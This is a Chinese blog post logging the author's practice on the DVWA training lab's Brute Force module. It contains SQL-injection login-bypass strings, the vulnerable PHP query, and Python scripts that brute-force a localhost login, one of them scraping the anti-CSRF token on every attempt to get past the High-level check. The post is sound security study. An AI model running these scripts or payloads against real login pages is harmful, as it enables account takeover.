<!DOCTYPE html>
<html lang="zh-CN">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <meta name="keywords" content="Hexo Theme Keep">
    <meta name="description" content="文明其思想，野蛮其体魄。">
    <meta name="author" content="二十八华生">
    
    <title>
        
            DVMA靶场学习记录 |
        
        二十八华生的博客
    </title>
    
<link rel="stylesheet" href="/css/style.css">

    <link rel="shortcut icon" href="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/bitbug_favicon.6goqr5bioz9c.webp">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/fontawesome.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/regular.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/solid.min.css">
    <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/hexo-theme-keep@3.5.2/source/fontawesome/css/brands.min.css">
    <script id="hexo-configurations">
    let KEEP = window.KEEP || {};
    KEEP.hexo_config = {"hostname":"c2yb8er.cn","root":"/","language":"zh-CN","path":"search.xml"};
    KEEP.theme_config = {"toc":{"enable":true,"number":false,"expand_all":true,"init_open":true},"style":{"primary_color":"#0066cc","logo":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp","favicon":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/bitbug_favicon.6goqr5bioz9c.webp","avatar":"https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp","font_size":"15.2px","hover":{"shadow":true,"scale":false},"first_screen":{"enable":true,"header_transparent":true,"background_img":"/images/bg.svg","description":"文明其思想，||野蛮其体魄。","font_color":null,"hitokoto":false},"scroll":{"progress_bar":true,"percent":false}},"local_search":{"enable":true,"preload":true},"code_copy":{},"code_block":{"tools":{"enable":true,"style":"default"},"highlight_theme":"default"},"side_tools":{},"pjax":{"enable":true},"lazyload":{"enable":true},"comment":{"enable":false,"use":"valine","valine":{"appid":null,"appkey":null,"placeholder":null},"gitalk":{"github_id":null,"github_admins":null,"repository":null,"client_id":null,"client_secret":null},"twikoo":{"env_id":null,"region":null,"version":"1.6.7"},"waline":{"server_url":null,"reaction":false,"version":2}},"post":{"author_label":{"enable":false,"auto":true,"custom_label_list":[]},"word_count":{"enable":true,"wordcount":true,"min2read":true},"img_align":"left","copyright_info":true},"version":"3.5.2"};
    KEEP.language_ago = {"second":"%s 秒前","minute":"%s 分钟前","hour":"%s 小时前","day":"%s 天前","week":"%s 周前","month":"%s 个月前","year":"%s 年前"};
    KEEP.language_code_block = {"copy":"复制代码","copied":"已复制","fold":"折叠代码块","folded":"已折叠"};
  </script>
<meta name="generator" content="Hexo 5.4.2"></head>


<body>
<div class="progress-bar-container">
    
        <span class="scroll-progress-bar"></span>
    

    
        <span class="pjax-progress-bar"></span>
        <i class="pjax-progress-icon fas fa-circle-notch fa-spin"></i>
    
</div>


<main class="page-container">

    

    <div class="page-main-content">

        <div class="page-main-content-top">
            
<header class="header-wrapper">

    <div class="header-content">
        <div class="left">
            
                <a class="logo-image" href="/">
                    <img src="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp">
                </a>
            
            <a class="logo-title" href="/">
               二十八华生的博客
            </a>
        </div>

        <div class="right">
            <div class="pc">
                <ul class="menu-list">
                    
                        <li class="menu-item">
                            <a class=""
                               href="/"
                            >
                                首页
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/archives"
                            >
                                归档
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/categories"
                            >
                                分类
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/tags"
                            >
                                标签
                            </a>
                        </li>
                    
                        <li class="menu-item">
                            <a class=""
                               href="/about"
                            >
                                关于
                            </a>
                        </li>
                    
                    
                        <li class="menu-item search search-popup-trigger">
                            <i class="fas fa-search"></i>
                        </li>
                    
                </ul>
            </div>
            <div class="mobile">
                
                    <div class="icon-item search search-popup-trigger"><i class="fas fa-search"></i></div>
                
                <div class="icon-item menu-bar">
                    <div class="menu-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <div class="header-drawer">
        <ul class="drawer-menu-list">
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/">首页</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/archives">归档</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/categories">分类</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/tags">标签</a>
                </li>
            
                <li class="drawer-menu-item flex-center">
                    <a class=""
                       href="/about">关于</a>
                </li>
            
        </ul>
    </div>

    <div class="window-mask"></div>

</header>


        </div>

        <div class="page-main-content-middle">

            <div class="main-content">

                
                    <div class="fade-in-down-animation">
    <div class="post-page-container">
        <div class="article-content-container">

            <div class="article-title">
                <span class="title-hover-animation">DVMA靶场学习记录</span>
            </div>

            
                <div class="article-header">
                    <div class="avatar">
                        <img src="https://cdn.staticaly.com/gh/C2yb8er/images@master/20230110/WanYe.2i8xng3vmthc.webp">
                    </div>
                    <div class="info">
                        <div class="author">
                            <span class="name">二十八华生</span>
                            
                        </div>
                        <div class="meta-info">
                            
<div class="article-meta-info">
    <span class="article-date article-meta-item">
        
            <i class="fa-regular fa-calendar-plus"></i>&nbsp;
        
        <span class="pc">2023-07-06 18:31:08</span>
        <span class="mobile">2023-07-06 18:31</span>
    </span>
    
        <span class="article-update-date article-meta-item">
        <i class="fas fa-file-pen"></i>&nbsp;
        <span class="pc">2023-07-08 16:24:05</span>
    </span>
    
    
        <span class="article-categories article-meta-item">
            <i class="fas fa-folder"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/categories/Web/">Web</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fas fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/DVMA%E9%9D%B6%E5%9C%BA%E5%AD%A6%E4%B9%A0%E8%AE%B0%E5%BD%95/">DVMA靶场学习记录</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
        <span class="article-wordcount article-meta-item">
            <i class="fas fa-file-word"></i>&nbsp;<span>5.6k 字</span>
        </span>
    
    
        <span class="article-min2read article-meta-item">
            <i class="fas fa-clock"></i>&nbsp;<span>25 分钟</span>
        </span>
    
    
        <span class="article-pv article-meta-item">
            <i class="fas fa-eye"></i>&nbsp;<span id="busuanzi_value_page_pv"></span>
        </span>
    
</div>

                        </div>
                    </div>
                </div>
            

            <div class="article-content keep-markdown-body">
                <blockquote>
<p>先博而后约</p>
</blockquote>
<span id="more"></span>



<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><h2 id="靶场介绍"><a href="#靶场介绍" class="headerlink" title="靶场介绍"></a>靶场介绍</h2><blockquote>
<ul>
<li>Damn Vulnerable Web Application (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goal is to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and to aid both students &amp; teachers to learn about web application security in a controlled class room environment.</li>
<li>The aim of DVWA is to practice some of the most common web vulnerabilities, with various levels of difficultly, with a simple straightforward interface.    </li>
</ul>
</blockquote>
<h2 id="我的目标"><a href="#我的目标" class="headerlink" title="我的目标"></a>我的目标</h2><blockquote>
<ul>
<li>通过完成本靶场实验，快速入门常见Web安全漏洞类型。为了避免重复造轮子以及提升效率，本记录会比较简洁，尽量完成low\middle\high的难度，Impossible难度可以暂且略过或者看看思路以及为什么这样做就能达到安全的效果。预计五天时间完结？From 2023/7/7.</li>
</ul>
</blockquote>
<h1 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h1><ul>
<li><p><a class="link" target="_blank" rel="noopener" href="https://blog.csdn.net/m0_60884805/article/details/127086871">教程<i class="fas fa-external-link-alt"></i></a></p>
</li>
<li><p><a class="link" target="_blank" rel="noopener" href="https://github.com/C2yb8er/DVWA">靶场下载地址(我fork了一份)<i class="fas fa-external-link-alt"></i></a></p>
</li>
</ul>
<h1 id="Brute-Force"><a href="#Brute-Force" class="headerlink" title="Brute Force"></a>Brute Force</h1><h2 id="Low"><a href="#Low" class="headerlink" title="Low"></a>Low</h2><h3 id="先用SQL注入试一下"><a href="#先用SQL注入试一下" class="headerlink" title="先用SQL注入试一下"></a>先用SQL注入试一下</h3><p>直接万能密码，考虑到是username注入应该是字符型：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">admin&#x27; # </span><br><span class="line">admin&#x27; and 1 = 1 # //这种跟第一种没有什么区别完全是浪费时间</span><br><span class="line">admin&#x27; or &#x27;1&#x27;=&#x27;1</span><br><span class="line">//下面这种不能实现注入</span><br><span class="line">admin&#x27; or 1 = 1 # </span><br></pre></td></tr></table></figure>



<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable">$query</span>  = <span class="string">&quot;SELECT * FROM `users` WHERE user = &#x27;<span class="subst">$user</span>&#x27; AND password = &#x27;<span class="subst">$pass</span>&#x27;;&quot;</span>;</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">//失败</span><br><span class="line">admin&#x27; or 1 = 1 #</span><br><span class="line">SELECT * FROM `users` WHERE user = &#x27;$user&#x27; AND password = &#x27;$pass&#x27;;</span><br><span class="line">SELECT * FROM `users` WHERE user = &#x27;admin&#x27; or 1 = 1 #&#x27; AND password = &#x27;$pass&#x27;;</span><br><span class="line"></span><br><span class="line">//成功</span><br><span class="line">admin&#x27; or &#x27;1&#x27;=&#x27;1 </span><br><span class="line">SELECT * FROM `users` WHERE user = &#x27;$user&#x27; AND password = &#x27;$pass&#x27;;</span><br><span class="line">SELECT * FROM `users` WHERE user = &#x27;admin&#x27; or &#x27;1&#x27;=&#x27;1&#x27; AND password = &#x27;$pass&#x27;;</span><br></pre></td></tr></table></figure>



<p>到这里我在思考为什么<code>admin&#39; or 1 = 1 # </code>注入不成功？原来是下面这串代码给过滤了：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>( <span class="variable">$result</span> &amp;&amp; <span class="title function_ invoke__">mysqli_num_rows</span>( <span class="variable">$result</span> ) == <span class="number">1</span> ) &#123;</span><br><span class="line">    <span class="comment">// Get users details</span></span><br><span class="line">    <span class="variable">$row</span>    = <span class="title function_ invoke__">mysqli_fetch_assoc</span>( <span class="variable">$result</span> );</span><br><span class="line">    <span class="variable">$avatar</span> = <span class="variable">$row</span>[<span class="string">&quot;avatar&quot;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Login successful</span></span><br><span class="line">    <span class="variable">$html</span> .= <span class="string">&quot;&lt;p&gt;Welcome to the password protected area <span class="subst">&#123;$user&#125;</span>&lt;/p&gt;&quot;</span>;</span><br><span class="line">    <span class="variable">$html</span> .= <span class="string">&quot;&lt;img src=\&quot;<span class="subst">&#123;$avatar&#125;</span>\&quot; /&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">    <span class="comment">// Login failed</span></span><br><span class="line">    <span class="variable">$html</span> .= <span class="string">&quot;&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>其中的：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>( <span class="variable">$result</span> &amp;&amp; <span class="title function_ invoke__">mysqli_num_rows</span>( <span class="variable">$result</span> ) == <span class="number">1</span> ) &#123;</span><br></pre></td></tr></table></figure>

<p>限制了结果只能返回一行数据，而用<code>admin&#39; or 1 = 1 #</code>会返回整个整个users表数据</p>
<h3 id="爆破"><a href="#爆破" class="headerlink" title="爆破"></a>爆破</h3><blockquote>
<p>查看源码后发现爆破无任何限制，最轻松的爆破了。</p>
</blockquote>
<p>试试用Python和Brup两种方式吧：</p>
<h4 id="Brup"><a href="#Brup" class="headerlink" title="Brup"></a>Brup</h4><blockquote>
<p>抓了包才知道原来是Get请求，我还以为是Post</p>
<p>感觉简单的爆破的最高要求就是你的密码本</p>
</blockquote>
<p>交数据—&gt;抓包—&gt;Intruder—&gt;Add—&gt;Load密码本—&gt;Cluster bomb—&gt;Attack</p>
<h4 id="Python"><a href="#Python" class="headerlink" title="Python"></a>Python</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># @C2yb8er modified from 国光</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">low_brute</span>():</span><br><span class="line">    url=<span class="string">&quot;http://localhost/DVWA/vulnerabilities/brute&quot;</span></span><br><span class="line">    cookies=&#123;</span><br><span class="line">        <span class="string">&#x27;security&#x27;</span>:<span class="string">&#x27;low&#x27;</span>,</span><br><span class="line">        <span class="string">&#x27;PHPSESSID&#x27;</span>:<span class="string">&#x27;qpdonp68m7eho4okic8q05mm50&#x27;</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;password.txt&quot;</span>, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            passwords = <span class="string">&#x27;&#x27;</span>.join(f.readlines()).split(<span class="string">&quot;\n&quot;</span>)</span><br><span class="line">        try_num = <span class="number">1</span></span><br><span class="line">        <span class="keyword">for</span> password <span class="keyword">in</span> passwords:</span><br><span class="line">            url = <span class="string">f&#x27;http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&amp;password=<span class="subst">&#123;password&#125;</span>&amp;Login=Login&#x27;</span></span><br><span class="line">            r = requests.get(url=url, cookies=cookies)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;Welcome to the password protected area&#x27;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&#x27;\n好耶！爆破成功！&#x27;</span>)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&#x27;username:admin \npassword:<span class="subst">&#123;password&#125;</span>\n&#x27;</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;第<span class="subst">&#123;try_num&#125;</span>次爆破失败！&quot;</span>)</span><br><span class="line">                try_num = try_num + <span class="number">1</span></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;文件读取异常&#x27;</span>)</span><br></pre></td></tr></table></figure>



<h2 id="Medium"><a href="#Medium" class="headerlink" title="Medium"></a>Medium</h2><ul>
<li>增加了 SQL 过滤函数</li>
<li>增加了错误的等待时间(2秒)</li>
</ul>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="comment">// Login failed</span></span><br><span class="line">	<span class="title function_ invoke__">sleep</span>( <span class="number">2</span> );</span><br><span class="line">	<span class="variable">$html</span> .= <span class="string">&quot;&lt;pre&gt;&lt;br /&gt;Username and/or password incorrect.&lt;/pre&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>​    本质与Low爆破无差异</p>
<h2 id="High"><a href="#High" class="headerlink" title="High"></a>High</h2><p>​    用前两关的方法都失效了，推测加入了一些机制来验证。</p>
<p>​    用Burp抓包发现出现了：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">user_token=b26dfa0893d1c0f2a5eb93f1e72c5622</span><br></pre></td></tr></table></figure>

<p>​    而且每次user_token附带的值还不太一样，故推测是当用户提交一个登录请求后服务器会返回一个长达32位的随机字符串，也就是说你必须得需要在实现自动化爆破前获取这个随机的user_token。如果你始终用一个固定的user_token去请求访问，肯定是爆破不成功的。</p>
<p>​    查看源码探究一下<code>user_token</code>是怎么来的：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//from high.php</span></span><br><span class="line"><span class="title function_ invoke__">checkToken</span>( <span class="variable">$_REQUEST</span>[ <span class="string">&#x27;user_token&#x27;</span> ], <span class="variable">$_SESSION</span>[ <span class="string">&#x27;session_token&#x27;</span> ], <span class="string">&#x27;index.php&#x27;</span> );</span><br><span class="line">--------------------</span><br><span class="line"><span class="title function_ invoke__">generateSessionToken</span>();</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//from dvwaPage.inc.php</span></span><br><span class="line"><span class="comment">// Token functions --</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkToken</span>(<span class="params"> <span class="variable">$user_token</span>, <span class="variable">$session_token</span>, <span class="variable">$returnURL</span> </span>) </span>&#123;  <span class="comment"># Validate the given (CSRF) token</span></span><br><span class="line">	<span class="keyword">global</span> <span class="variable">$_DVWA</span>;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span> (<span class="title function_ invoke__">in_array</span>(<span class="string">&quot;disable_authentication&quot;</span>, <span class="variable">$_DVWA</span>) &amp;&amp; <span class="variable">$_DVWA</span>[<span class="string">&#x27;disable_authentication&#x27;</span>]) &#123;</span><br><span class="line">		<span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>( <span class="variable">$user_token</span> !== <span class="variable">$session_token</span> || !<span class="keyword">isset</span>( <span class="variable">$session_token</span> ) ) &#123;</span><br><span class="line">		<span class="title function_ invoke__">dvwaMessagePush</span>( <span class="string">&#x27;CSRF token is incorrect&#x27;</span> );</span><br><span class="line">		<span class="title function_ invoke__">dvwaRedirect</span>( <span class="variable">$returnURL</span> );</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">generateSessionToken</span>(<span class="params"></span>) </span>&#123;  <span class="comment"># Generate a brand new (CSRF) token</span></span><br><span class="line">	<span class="keyword">if</span>( <span class="keyword">isset</span>( <span class="variable">$_SESSION</span>[ <span class="string">&#x27;session_token&#x27;</span> ] ) ) &#123;</span><br><span class="line">		<span class="title function_ invoke__">destroySessionToken</span>();</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="variable">$_SESSION</span>[ <span class="string">&#x27;session_token&#x27;</span> ] = <span class="title function_ invoke__">md5</span>( <span class="title function_ invoke__">uniqid</span>() );</span><br><span class="line">    <span class="comment">//基于当前时间微秒级别的唯一标识符，然后通过 md5() 函数对其进行哈希处理，以获得一个固定长度的字符串表示会话令牌。</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">destroySessionToken</span>(<span class="params"></span>) </span>&#123;  <span class="comment"># Destroy any session with the name &#x27;session_token&#x27;</span></span><br><span class="line">	<span class="keyword">unset</span>( <span class="variable">$_SESSION</span>[ <span class="string">&#x27;session_token&#x27;</span> ] );</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">tokenField</span>(<span class="params"></span>) </span>&#123;  <span class="comment"># Return a field for the (CSRF) token</span></span><br><span class="line">	<span class="keyword">return</span> <span class="string">&quot;&lt;input type=&#x27;hidden&#x27; name=&#x27;user_token&#x27; value=&#x27;<span class="subst">&#123;$_SESSION[ &#x27;session_token&#x27; ]&#125;</span>&#x27; /&gt;&quot;</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">// -- END (Token functions)</span></span><br></pre></td></tr></table></figure>

<h3 id="Python-1"><a href="#Python-1" class="headerlink" title="Python"></a>Python</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># @C2yb8er modified from 国光</span></span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">get_token</span>(<span class="params">cookies</span>):</span><br><span class="line">    index_url = <span class="string">&#x27;http://localhost/DVWA/vulnerabilities/brute/index.php&#x27;</span></span><br><span class="line">    index_html = requests.get(url=index_url, cookies=cookies, timeout=<span class="number">3</span>).text</span><br><span class="line">    token_pattern = re.<span class="built_in">compile</span>(<span class="string">r&#x27;name=&quot;user_token&quot; value=&quot;(.*?)&quot;&#x27;</span>)</span><br><span class="line">    token = token_pattern.findall(index_html)[<span class="number">0</span>]</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">f&quot;获取token成功，值为<span class="subst">&#123;token&#125;</span>&quot;</span>,end=<span class="string">&#x27; &#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> token</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">high_brute</span>(<span class="params">cookies</span>):</span><br><span class="line">    url=<span class="string">&quot;http://localhost/DVWA/vulnerabilities/brute&quot;</span></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;password.txt&quot;</span>, <span class="string">&quot;r&quot;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            passwords = <span class="string">&#x27;&#x27;</span>.join(f.readlines()).split(<span class="string">&quot;\n&quot;</span>)</span><br><span class="line">        try_num = <span class="number">1</span></span><br><span class="line">        <span class="keyword">for</span> password <span class="keyword">in</span> passwords:</span><br><span class="line">            token = get_token(cookies)</span><br><span class="line">            url = <span class="string">f&#x27;http://localhost/DVWA/vulnerabilities/brute/index.php?username=admin&amp;password=<span class="subst">&#123;password&#125;</span>&amp;Login=Login&amp;user_token=<span class="subst">&#123;token&#125;</span>&#x27;</span></span><br><span class="line">            r = requests.get(url=url, cookies=cookies)</span><br><span class="line">            <span class="keyword">if</span> <span class="string">&#x27;Welcome to the password protected area&#x27;</span> <span class="keyword">in</span> r.text:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">&#x27;\n好耶！爆破成功！&#x27;</span>)</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&#x27;username:admin \npassword:<span class="subst">&#123;password&#125;</span>\n&#x27;</span>)</span><br><span class="line">                <span class="keyword">break</span></span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;第<span class="subst">&#123;try_num&#125;</span>次爆破失败！&quot;</span>)</span><br><span class="line">                try_num = try_num + <span class="number">1</span></span><br><span class="line">    <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">        <span class="built_in">print</span>(<span class="string">&#x27;文件读取异常&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cookies=&#123;</span><br><span class="line">    <span class="string">&#x27;security&#x27;</span>: <span class="string">&#x27;high&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;PHPSESSID&#x27;</span>:<span class="string">&#x27;qpdonp68m7eho4okic8q05mm50&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">high_brute(cookies)</span><br></pre></td></tr></table></figure>

<p><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230706/St2iv8rimage.7bdic8sb7740.png"></p>
<p>​    我在思考，如果前端没有泄露这个<code>user_token</code>该怎么办？</p>
<p>补充相关知识：</p>
<h5 id><a href="#" class="headerlink" title="(.*?)"></a>(.*?)</h5><blockquote>
<p>正则表达式中的 <code>(.*?)</code> 用于匹配任意字符（除换行符外）的最短序列。在 <code>(.*?)</code> 的模式下，<code>?</code> 是一个非贪婪操作符，它告诉正则表达式引擎在匹配时使用最短的可能性。</p>
<p>在上述代码中，<code>(.*?)</code> 用于捕获 <code>value</code> 属性的值，即匹配 <code>value=&quot;...&quot;</code> 中的 <code>&quot;...&quot;</code> 部分。通过非贪婪操作符 <code>?</code>，正则表达式引擎会在遇到下一个字符（在此例中为双引号 <code>&quot;</code>）之前尽可能少地匹配字符，以确保匹配的是 <code>value</code> 属性的值，而不是包含其他字符的更长字符串。</p>
<p>因此，<code>(.*?)</code> 能够匹配 <code>value</code> 属性的值是因为它会尽可能少地匹配字符，直到遇到下一个字符为止，从而得到正确的值。</p>
</blockquote>
<h5 id="findall"><a href="#findall" class="headerlink" title="findall"></a>findall</h5><blockquote>
<p><code>findall</code> 是正则表达式对象的一个方法，用于在给定的字符串中搜索所有匹配模式的部分，并返回一个包含所有匹配结果的列表。它的语法如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">re.findall(pattern, string, flags=<span class="number">0</span>)</span><br></pre></td></tr></table></figure>

<p>参数说明：</p>
<ul>
<li><code>pattern</code>：要匹配的正则表达式模式。</li>
<li><code>string</code>：要搜索的字符串。</li>
<li><code>flags</code>（可选）：用于指定匹配模式的标志。常用的标志包括 <code>re.IGNORECASE</code>（忽略大小写）、<code>re.MULTILINE</code>（多行模式）等。</li>
</ul>
<p><code>findall</code> 方法会搜索整个字符串，找到所有符合模式的部分，并返回一个包含所有匹配结果的列表。每个匹配结果都以字符串的形式存储在列表中。</p>
</blockquote>
<h3 id="Burp"><a href="#Burp" class="headerlink" title="Burp"></a>Burp</h3><p><a class="link" target="_blank" rel="noopener" href="https://www.cnblogs.com/chadlas/articles/15706231.html">跟着这个教程打了一遍<i class="fas fa-external-link-alt"></i></a><br><img lazyload alt="image" data-src="https://cdn.staticaly.com/gh/C2yb8er/picx-images-hosting@master/20230706/St2iv8rimage.4juwa2bow2y0.png"></p>
<h2 id="Impossible"><a href="#Impossible" class="headerlink" title="Impossible"></a>Impossible</h2><blockquote>
<p>审计一下源码吧！源码100行左右，是前面的两倍多，安全是有原因的哇！</p>
<p>SQL注入限制很强，账户锁定相关状态也是放在后端数据库的，账号登录密码错误超过了三次以上就会被锁住15分钟。</p>
<p>没有完全审计完搞懂，改天再看看。—from 2023/7/6</p>
</blockquote>
